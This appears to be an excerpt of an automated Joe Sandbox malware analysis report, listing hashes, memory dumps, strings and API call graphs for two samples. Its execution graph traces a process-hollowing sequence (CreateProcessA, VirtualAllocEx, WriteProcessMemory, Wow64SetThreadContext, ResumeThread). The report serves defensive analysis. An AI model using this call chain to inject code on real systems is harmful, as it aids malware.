                                                • Opcode Fuzzy Hash: 415e2d2e8dba87a2d2e6439afb47c22683664601facba2fed1b853c970ae83d2
                                                • Instruction Fuzzy Hash: CA1106B1C0066A9BCB10DF9AC44479EFBF4AB48320F10856AD418B7251D378A950CFE5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0642E68A), ref: 0642E777
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2976325097.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6420000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: b4d06fbf24ff88bb9946407ae11c9cb2ce926071909f07e5aff5c99dd143353a
                                                • Instruction ID: 9688eda89170871e5a968b17a965db99db1699af6cdcd68661e80dc89f4f9c80
                                                • Opcode Fuzzy Hash: b4d06fbf24ff88bb9946407ae11c9cb2ce926071909f07e5aff5c99dd143353a
                                                • Instruction Fuzzy Hash: 8E1103B1C00269DFCB10DF9AD4447DEFBF4AB48320F24816AD818A7251D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0641B38A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: be35a5c015927dceeead22d90aebbcba1f563888ecbc6bfe82d403a39b2b4b00
                                                • Instruction ID: 1c29904cf5993703a84564cd052a7ef0106d2e5f92bf8cef1e0b8fe884a789b0
                                                • Opcode Fuzzy Hash: be35a5c015927dceeead22d90aebbcba1f563888ecbc6bfe82d403a39b2b4b00
                                                • Instruction Fuzzy Hash: CB1104B6D003098FDB10CF9AC444ADEFBF4EB48310F10842AD459AB710C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0641AEE4), ref: 0641B11E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2975902175.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_6410000_qmUxKv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 7bd7868cc8c13335226613be0b4389e122e44bf8c8bd53cc78dbd2a93bf8d778
                                                • Instruction ID: c271073dda3fe88b7df0750f22b32e443792c881f1268b1044a1c4bb224a8bc4
                                                • Opcode Fuzzy Hash: 7bd7868cc8c13335226613be0b4389e122e44bf8c8bd53cc78dbd2a93bf8d778
                                                • Instruction Fuzzy Hash: 0E1132B6C00708CFCB10CF9AC844ADEFBF4EB48324F10806AD828AB210C374A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2930992363.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ccd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 623292acd84253c1a692b65d6d4be4552cc5bee4f6c95cddd53d4ae2664ca267
                                                • Instruction ID: 71a88004a22997d45ffe32e6b196ae774d5d2e7a0cb195e313ad0a517f765831
                                                • Opcode Fuzzy Hash: 623292acd84253c1a692b65d6d4be4552cc5bee4f6c95cddd53d4ae2664ca267
                                                • Instruction Fuzzy Hash: 3621D071604200DFDB14DF18D9C4B26BBA5EB84324F30C5BDE84A4B256C33AD447CAA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2930992363.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_2ccd000_qmUxKv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfafa1755a44e66ad6834d34df74442a54311f690d1e7b6674f5454ed940529c
                                                • Instruction ID: 06bb1eb68919bddc4df34b30c7088be356ffd752b657b277bcda5877b36162ab
                                                • Opcode Fuzzy Hash: dfafa1755a44e66ad6834d34df74442a54311f690d1e7b6674f5454ed940529c
                                                • Instruction Fuzzy Hash: 3B2195755093C08FD702CF24D594715BF71EB86214F28C5EED8498F6A7C33A940ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.1%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:180
                                                Total number of Limit Nodes:17
                                                execution_graph 32668 16d4668 32669 16d4672 32668->32669 32671 16d4759 32668->32671 32672 16d477d 32671->32672 32676 16d4868 32672->32676 32680 16d4858 32672->32680 32677 16d488f 32676->32677 32678 16d496c 32677->32678 32684 16d44b0 32677->32684 32681 16d4868 32680->32681 32682 16d496c 32681->32682 32683 16d44b0 CreateActCtxA 32681->32683 32683->32682 32685 16d58f8 CreateActCtxA 32684->32685 32687 16d59bb 32685->32687 32687->32687 32699 16dac08 32703 16dacef 32699->32703 32711 16dad00 32699->32711 32700 16dac17 32704 16dad00 32703->32704 32705 16dad34 32704->32705 32719 16db388 32704->32719 32723 16db398 32704->32723 32705->32700 32706 16dad2c 32706->32705 32707 16daf38 GetModuleHandleW 32706->32707 32708 16daf65 32707->32708 32708->32700 32712 16dad01 32711->32712 32713 16dad34 32712->32713 32717 16db388 LoadLibraryExW 32712->32717 32718 16db398 LoadLibraryExW 32712->32718 32713->32700 32714 16dad2c 32714->32713 32715 16daf38 GetModuleHandleW 32714->32715 32716 16daf65 32715->32716 32716->32700 32717->32714 32718->32714 32720 16db3ac 32719->32720 32721 16db3d1 32720->32721 32727 16daf88 32720->32727 32721->32706 32724 16db3ac 32723->32724 32725 16db3d1 32724->32725 32726 16daf88 LoadLibraryExW 32724->32726 32725->32706 32726->32725 32728 16db558 LoadLibraryExW 32727->32728 32730 16db5d1 32728->32730 32730->32721 32891 16dd098 32892 16dd0de GetCurrentProcess 32891->32892 32894 16dd129 32892->32894 32895 16dd130 GetCurrentThread 32892->32895 32894->32895 32896 16dd16d GetCurrentProcess 32895->32896 32897 16dd166 32895->32897 32898 16dd1a3 32896->32898 32897->32896 32899 16dd1cb GetCurrentThreadId 32898->32899 32900 16dd1fc 32899->32900 32688 32bade0 32689 32baf6b 32688->32689 32691 32bae06 32688->32691 32691->32689 32692 32b92a0 32691->32692 32693 32bb060 PostMessageW 32692->32693 32694 32bb0cc 32693->32694 32694->32691 32695 16dd3a1 32696 16dd367 DuplicateHandle 32695->32696 32698 16dd3aa 32695->32698 32697 16dd376 
32696->32697 32731 32b7f85 32735 32b9bf1 32731->32735 32752 32b9c00 32731->32752 32732 32b7f94 32736 32b9c00 32735->32736 32749 32b9c3e 32736->32749 32769 32ba1ab 32736->32769 32774 32ba374 32736->32774 32779 32ba173 32736->32779 32784 32b9f18 32736->32784 32790 32ba759 32736->32790 32795 32baac4 32736->32795 32799 32ba2c6 32736->32799 32807 32ba281 32736->32807 32811 32ba361 32736->32811 32816 32ba0e1 32736->32816 32822 32ba243 32736->32822 32827 32ba6ec 32736->32827 32832 32ba8c8 32736->32832 32837 32b9f28 32736->32837 32749->32732 32753 32b9c1a 32752->32753 32754 32ba1ab 2 API calls 32753->32754 32755 32b9f28 2 API calls 32753->32755 32756 32ba8c8 2 API calls 32753->32756 32757 32ba6ec 2 API calls 32753->32757 32758 32ba243 2 API calls 32753->32758 32759 32ba0e1 2 API calls 32753->32759 32760 32ba361 2 API calls 32753->32760 32761 32ba281 2 API calls 32753->32761 32762 32ba2c6 4 API calls 32753->32762 32763 32baac4 2 API calls 32753->32763 32764 32ba759 2 API calls 32753->32764 32765 32b9f18 2 API calls 32753->32765 32766 32b9c3e 32753->32766 32767 32ba173 2 API calls 32753->32767 32768 32ba374 2 API calls 32753->32768 32754->32766 32755->32766 32756->32766 32757->32766 32758->32766 32759->32766 32760->32766 32761->32766 32762->32766 32763->32766 32764->32766 32765->32766 32766->32732 32767->32766 32768->32766 32770 32ba1ba 32769->32770 32843 32b71ea 32770->32843 32847 32b71f0 32770->32847 32771 32ba437 32775 32ba397 32774->32775 32851 32b786a 32775->32851 32855 32b7870 32775->32855 32776 32ba5f5 32776->32749 32781 32ba1b5 32779->32781 32780 32ba781 32781->32749 32781->32780 32859 32b76d8 32781->32859 32863 32b76d0 32781->32863 32786 32b9f5b 32784->32786 32785 32ba01a 32785->32749 32786->32785 32867 32b7af8 32786->32867 32871 32b7aed 32786->32871 32791 32ba822 32790->32791 32875 32b77aa 32791->32875 32879 32b77b0 32791->32879 32792 32ba843 32797 32b786a WriteProcessMemory 32795->32797 32798 32b7870 WriteProcessMemory 32795->32798 32796 32baaeb 32797->32796 
32798->32796 32803 32b76d8 Wow64SetThreadContext 32799->32803 32804 32b76d0 Wow64SetThreadContext 32799->32804 32800 32ba1d3 32801 32ba753 32800->32801 32805 32b71ea ResumeThread 32800->32805 32806 32b71f0 ResumeThread 32800->32806 32802 32ba437 32803->32800 32804->32800 32805->32802 32806->32802 32883 32b7958 32807->32883 32887 32b7960 32807->32887 32808 32ba150 32808->32749 32812 32ba36e 32811->32812 32814 32b71ea ResumeThread 32812->32814 32815 32b71f0 ResumeThread 32812->32815 32813 32ba437 32814->32813 32815->32813 32817 32ba01a 32816->32817 32818 32b9fba 32816->32818 32817->32749 32818->32817 32820 32b7af8 CreateProcessA 32818->32820 32821 32b7aed CreateProcessA 32818->32821 32819 32ba128 32819->32749 32820->32819 32821->32819 32823 32ba1b5 32822->32823 32823->32749 32824 32ba781 32823->32824 32825 32b76d8 Wow64SetThreadContext 32823->32825 32826 32b76d0 Wow64SetThreadContext 32823->32826 32825->32823 32826->32823 32828 32ba6f2 32827->32828 32830 32b786a WriteProcessMemory 32828->32830 32831 32b7870 WriteProcessMemory 32828->32831 32829 32ba20f 32829->32749 32830->32829 32831->32829 32833 32ba703 32832->32833 32834 32ba20f 32833->32834 32835 32b786a WriteProcessMemory 32833->32835 32836 32b7870 WriteProcessMemory 32833->32836 32834->32749 32835->32834 32836->32834 32839 32b9f5b 32837->32839 32838 32ba01a 32838->32749 32839->32838 32841 32b7af8 CreateProcessA 32839->32841 32842 32b7aed CreateProcessA 32839->32842 32840 32ba128 32840->32749 32841->32840 32842->32840 32844 32b71f0 ResumeThread 32843->32844 32846 32b7261 32844->32846 32846->32771 32848 32b7230 ResumeThread 32847->32848 32850 32b7261 32848->32850 32850->32771 32852 32b78b8 WriteProcessMemory 32851->32852 32854 32b790f 32852->32854 32854->32776 32856 32b78b8 WriteProcessMemory 32855->32856 32858 32b790f 32856->32858 32858->32776 32860 32b771d Wow64SetThreadContext 32859->32860 32862 32b7765 32860->32862 32862->32781 32864 32b76d8 Wow64SetThreadContext 32863->32864 32866 32b7765 32864->32866 
32866->32781 32868 32b7b81 32867->32868 32868->32868 32869 32b7ce6 CreateProcessA 32868->32869 32870 32b7d43 32869->32870 32872 32b7af9 32871->32872 32872->32872 32873 32b7ce6 CreateProcessA 32872->32873 32874 32b7d43 32873->32874 32876 32b77f0 VirtualAllocEx 32875->32876 32878 32b782d 32876->32878 32878->32792 32880 32b77f0 VirtualAllocEx 32879->32880 32882 32b782d 32880->32882 32882->32792 32884 32b7960 ReadProcessMemory 32883->32884 32886 32b79ef 32884->32886 32886->32808 32888 32b79ab ReadProcessMemory 32887->32888 32890 32b79ef 32888->32890 32890->32808

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 7afe37630eb2af068107638280cd54c9e20c03de9af3d71e4bab6e209d96f7ef
                                                • Instruction ID: 4f3f35918dc4b0fdbfda3bf2e7d6f71583bb1fad9df267ac9192b32856ddd721
                                                • Opcode Fuzzy Hash: 7afe37630eb2af068107638280cd54c9e20c03de9af3d71e4bab6e209d96f7ef
                                                • Instruction Fuzzy Hash: 6CB19AB1E102899FEF08CFA9D8816DDBBB2FBC9350F14822AD515AB314D7719942CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$)"
                                                • API String ID: 0-4031938444
                                                • Opcode ID: 982494fcf42573e655492ae93480d86cf79f06f3ff870e9e65bd2130ebff3d48
                                                • Instruction ID: 55d7e775f6579af2fdcacf5cccf08d1fc3fbc690b86e03ea0ec9d5c975313094
                                                • Opcode Fuzzy Hash: 982494fcf42573e655492ae93480d86cf79f06f3ff870e9e65bd2130ebff3d48
                                                • Instruction Fuzzy Hash: 4581F2B0E102099FDB08CFAAC984AEEFBB2FF89304F20812AD415AB354D7759905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 3a89f661c4b682f378f17fb55ab5e5b4cae024a148d7ed436b5d9079ac74fc98
                                                • Instruction ID: 18c70cc59fd454c6000c664a3d8fb68305e5218d440ce5f3074e048936457ebd
                                                • Opcode Fuzzy Hash: 3a89f661c4b682f378f17fb55ab5e5b4cae024a148d7ed436b5d9079ac74fc98
                                                • Instruction Fuzzy Hash: 16F19FF1A24206EFE704DFA5D4814EEFBB2FB85390B18D666D511EB211C7349A82CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: a9fdcd9dfacb64e913201f8c86ac26cd1322afd29291ae9dd0060ba3d25aaa0b
                                                • Instruction ID: 6d34c82537b9138d247c4eeb25bf2a3976f66164bef6b19e3fbfd6dd9d439cc4
                                                • Opcode Fuzzy Hash: a9fdcd9dfacb64e913201f8c86ac26cd1322afd29291ae9dd0060ba3d25aaa0b
                                                • Instruction Fuzzy Hash: BDD18FB0E2420AEFDB04DFA5C4814AEFBB6FF89340B19D665D411EB215D7349A42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: e789cb659157dde210d5bf235dc113013cbd9cbf924a45fb631eb6cc06d54d39
                                                • Instruction ID: 51a3e8aeef079acb69755606e17d86f3f9a7205611bc233d2cbe7e17973cef66
                                                • Opcode Fuzzy Hash: e789cb659157dde210d5bf235dc113013cbd9cbf924a45fb631eb6cc06d54d39
                                                • Instruction Fuzzy Hash: 85D138B0D1520AEFDB04DFA6C4848AEFBB6FF89340F14D669D411AB215D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: d24c403f106aa7052350c9ad86a636c74a752f7693c5df308082a1204445d3bf
                                                • Instruction ID: c41a8ed39ce47da7d7a0083ea97d71a9d08884d67738d15a0a7799479c4201d2
                                                • Opcode Fuzzy Hash: d24c403f106aa7052350c9ad86a636c74a752f7693c5df308082a1204445d3bf
                                                • Instruction Fuzzy Hash: 85311CB1E006189BEB18CFABD84179EFBF7EFC8200F14C1BAD408A6254EB345A418F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae4447e1de9035d0d58a0fe0966556d13a18f1653c11ea9973bc3b61eb231421
                                                • Instruction ID: cf285a9c1ec1340274bb19058221707a812a97fa2c27eb6a9da8737d06df5d37
                                                • Opcode Fuzzy Hash: ae4447e1de9035d0d58a0fe0966556d13a18f1653c11ea9973bc3b61eb231421
                                                • Instruction Fuzzy Hash: 01913AB0D15208EFDB48CFA6D5809ADFBF6FB8A340F20A519E116B7224D734A915CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46c0a94cbc2c45b164a1b2ff0ea5148b966be37f0d84c5ec15e5628ac7adc055
                                                • Instruction ID: b624dd5007daee601e783d3e56b20c44431f38d3dd64c136b3c0c52696f7898f
                                                • Opcode Fuzzy Hash: 46c0a94cbc2c45b164a1b2ff0ea5148b966be37f0d84c5ec15e5628ac7adc055
                                                • Instruction Fuzzy Hash: 2D914AB0D11209EFDB48CFA6D5809ADFBF6FB8A340F20A526E116B7224D734A915CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f60f543bf696fc521fbbda6020c60fa36ee0ea4c7e7240f03331f9c2cd5c92cc
                                                • Instruction ID: 1987952d7561d5acd075f28422f60a3400dccee9849105057784389c6a96c8d5
                                                • Opcode Fuzzy Hash: f60f543bf696fc521fbbda6020c60fa36ee0ea4c7e7240f03331f9c2cd5c92cc
                                                • Instruction Fuzzy Hash: 148101B4E14219DFDF04CFA9C8819EEFBB2FB89240F10961AD911B7254D734A922CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 918b6931e0e20045d4e800bb28e42396262e01c7ee19defa081b7a5ce523672f
                                                • Instruction ID: 44cea20bf21ec9500a4a1fa07d04bf72af4c000c76984d37b8e665c837af039b
                                                • Opcode Fuzzy Hash: 918b6931e0e20045d4e800bb28e42396262e01c7ee19defa081b7a5ce523672f
                                                • Instruction Fuzzy Hash: 9981F3B4E14219DFDF04CFA9C8819EEFBB2FF89240F10995AD911A7254D738A922CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a6ca9393f1a60c142cfd63290a76ba8b72afdf7b86b7229e83838faffa357e18
                                                • Instruction ID: 93872bd102d2393107feec52629a9b81d4daa6100f4f2997be4f2c15e723838d
                                                • Opcode Fuzzy Hash: a6ca9393f1a60c142cfd63290a76ba8b72afdf7b86b7229e83838faffa357e18
                                                • Instruction Fuzzy Hash: B121E9B1E016189BEB18CF9BD8446DEFBF7AFC9350F14C17AD408A6258DB701A55CE50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec38eea3964c7ee51842c44415e668405d08f4d4987a6240f99aaebc7a481af6
                                                • Instruction ID: ca7d3b3689e8d5838956184471891b0e3b68da48babb4c626ae43cb638997581
                                                • Opcode Fuzzy Hash: ec38eea3964c7ee51842c44415e668405d08f4d4987a6240f99aaebc7a481af6
                                                • Instruction Fuzzy Hash: 9021DAB1E016589FEB18CFABC85529EBFF3AFC9310F18C16AD409AA254DB7419458F50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-1437089595
                                                • Opcode ID: 6c6c04ab8a0a435a5f4895e1376cacb08fbceb49459f9c0532ff38c0e39b7ccc
                                                • Instruction ID: ea22af3d937549addb5c1258596f6fb49953c4f1183b50e4a03372a81df2f75b
                                                • Opcode Fuzzy Hash: 6c6c04ab8a0a435a5f4895e1376cacb08fbceb49459f9c0532ff38c0e39b7ccc
                                                • Instruction Fuzzy Hash: 9EB1C3B0E1421DEFFB18CF94C944AADB7B2BBC5781F648A66E5016F295CB309C45CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-2818371802
                                                • Opcode ID: 8e2403b444047463a32eacaceff1d3cfc8f90567d78f3191a6983488273f2cf0
                                                • Instruction ID: 5369280987bcf289059872474cf2c577c8ef469f6465b7c30a80a2e5b7e80f4a
                                                • Opcode Fuzzy Hash: 8e2403b444047463a32eacaceff1d3cfc8f90567d78f3191a6983488273f2cf0
                                                • Instruction Fuzzy Hash: 2CF1A174F40209EFEB149B69C958B7E7AE2BBC4745F108D26E442AF394EB748C41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                                                • API String ID: 0-3830373724
                                                • Opcode ID: 0a5a0d88c27c827e9e9d63e1424839969bda410a76a5ce524951ee00f8c405a5
                                                • Instruction ID: 0a4bb1bd5c8f6a1ca966f7d74817ea861bbd804b784534de9f5b5a0926d66081
                                                • Opcode Fuzzy Hash: 0a5a0d88c27c827e9e9d63e1424839969bda410a76a5ce524951ee00f8c405a5
                                                • Instruction Fuzzy Hash: 03E1B274B40209EFEB14DB69C859B7D7AE2FBC4785F108D26E542AB384EB748C41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                • API String ID: 0-1901060420
                                                • Opcode ID: 5bf59f24420bf2dfe0cefbd59c48946183c8f768079f06ee77389348f2d214bb
                                                • Instruction ID: 3b9c6fad6037ba3fcdc6286dc5e7f57613da7ba2c7cbafac5701ea07c87cef9e
                                                • Opcode Fuzzy Hash: 5bf59f24420bf2dfe0cefbd59c48946183c8f768079f06ee77389348f2d214bb
                                                • Instruction Fuzzy Hash: B84180B4A04209DFEB04DFA8C99456EBBB2FF84340F64CE69C0165B3A5D731C945CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 016DD116
                                                • GetCurrentThread.KERNEL32 ref: 016DD153
                                                • GetCurrentProcess.KERNEL32 ref: 016DD190
                                                • GetCurrentThreadId.KERNEL32 ref: 016DD1E9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: e68d5775bfc9c04027cff7af55900934754b1ed08bd902520cb4b1e561da32b3
                                                • Instruction ID: d2f90da3e2e82e4a52e0e97bf1c750fd2cb6c5cee615245ebdfb6f0e81d71ff7
                                                • Opcode Fuzzy Hash: e68d5775bfc9c04027cff7af55900934754b1ed08bd902520cb4b1e561da32b3
                                                • Instruction Fuzzy Hash: 905166B0D002098FEB14DFA9D948BEEBFF5EB48304F208459E519A73A0DB74A944CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 016DD116
                                                • GetCurrentThread.KERNEL32 ref: 016DD153
                                                • GetCurrentProcess.KERNEL32 ref: 016DD190
                                                • GetCurrentThreadId.KERNEL32 ref: 016DD1E9
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1835607829.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_16d0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 7f54e0d9be4a5ed88e0721182cf464dba5d7b4438357f74d1104c453a9874ba1
                                                • Instruction ID: e8f0d747b029d3213bd728e84ccf8027ef7727a28f96c6d03c88621860eafe8f
                                                • Opcode Fuzzy Hash: 7f54e0d9be4a5ed88e0721182cf464dba5d7b4438357f74d1104c453a9874ba1
                                                • Instruction Fuzzy Hash: 6F5146B0D002098FEB14DFA9D948BEEBFF5EB48314F208459E519A73A0DB74A944CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq$8bq$8bq
                                                • API String ID: 0-2509483264
                                                • Opcode ID: 3e0542754a7669478d9c781d7b0222b58e16bdf29fb363371e5c3abb1655140b
